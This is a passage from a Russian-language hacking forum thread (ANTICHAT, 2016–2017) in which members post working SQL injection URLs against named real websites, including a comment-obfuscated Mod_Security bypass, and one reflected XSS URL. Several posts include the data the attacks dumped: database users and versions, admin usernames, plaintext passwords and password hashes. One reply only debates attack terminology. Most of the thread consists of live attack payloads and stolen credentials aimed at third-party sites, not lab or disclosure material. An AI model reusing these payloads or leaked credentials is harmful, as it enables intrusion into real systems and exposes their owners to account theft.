HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #241  
Старый 12.12.2016, 16:17
MrFear41
Guest
Сообщений: n/a
Провел на форуме:
909

Репутация: 0
По умолчанию

Exploit :

Boolean Based SQL Injection

Код:
Code:
http://villagelifeserver.ru/contest.php?ID=' OR 'ns'='ns
 
Ответить с цитированием

  #242  
Старый 04.02.2017, 15:13
SeytaR
Guest
Сообщений: n/a
Провел на форуме:
1802

Репутация: 7
По умолчанию

Обход WAF (Mod_Security)

http://www.slightergolf.com/products...p?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,user(),6,7,8,9,10,11--+

USER():slighter_sgAdmin@localhos

http://www.slightergolf.com/products...p?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,/*!CONVERT*/(/*!12345GrOuP_CoNcAT(name,0x3a,password)*/ USING latin1),6,7,8,9,10,11 /*!12345from*/ admins--+

Name:misty,slighter,sgadmin


Password:svD1A0JC5ggN,C4XTZLtTlTUg,C4XTZLtTlTUg
 
Ответить с цитированием

  #243  
Старый 04.02.2017, 15:26
SeytaR
Guest
Сообщений: n/a
Провел на форуме:
1802

Репутация: 7
По умолчанию

SQL injec.

Scott County CDA


http://www.scottcda.org/page.php?id=-16 union select 1,group_concat(email,0x3a,password),3,4,5,6 from admin--+
 
Ответить с цитированием

  #244  
Старый 04.02.2017, 20:15
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

 
Ответить с цитированием

  #245  
Старый 05.02.2017, 17:40
SeytaR
Guest
Сообщений: n/a
Провел на форуме:
1802

Репутация: 7
По умолчанию

SQL INJECTIONProviding Turnkey Solutions To Automotive Industry

http://www.nashgroup.co.in/about.php?catid=-5 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9--+

nashgrou_user@localhost : nashgrou_dbnew : 5.5.52-cll

http://www.nashgroup.co.in/about.php?catid=-5 union select 1,concat(username,0x3a,userpass),3,4,5,6,7,8,9 from tbladmin--+

orangedc:XCIJIlczVnYEIFAxAG8MPQ==
 
Ответить с цитированием

  #246  
Старый 05.02.2017, 21:01
SeytaR
Guest
Сообщений: n/a
Провел на форуме:
1802

Репутация: 7
По умолчанию

SQL INJECTION DRONES LAB

https://www.drones-lab.com/blog/post.php?id=-24 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6,7,8,9--+&titre=Drones-lab-est-le-er-centre-de-formation-agree-par-lOSAC#.WJizCdKLTIX


droneslab@localhost : droneslab_website : 10.1.18-MariaDB

USER_PRIVILEGES:droneslab'@'localhost' -> NO
 
Ответить с цитированием

  #247  
Старый 09.02.2017, 14:45
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

Firefox

Код:
Code:
http://top.zhyk.ru/search?rate=0%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&chronic=0&filter=%D0%9F%D0%BE%D0%B4%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D1%8C+%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80
 
Ответить с цитированием

  #248  
Старый 10.02.2017, 04:53
leksadin
Guest
Сообщений: n/a
Провел на форуме:
28741

Репутация: 12
По умолчанию

Blind SQL injection

agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32

В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.

Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется.
 
Ответить с цитированием

  #249  
Старый 16.02.2017, 12:07
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

 
Ответить с цитированием

  #250  
Старый 19.02.2017, 00:44
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию

Цитата:
Сообщение от leksadin  
leksadin said:

Blind SQL injection
agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32
В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.
Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется.
Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ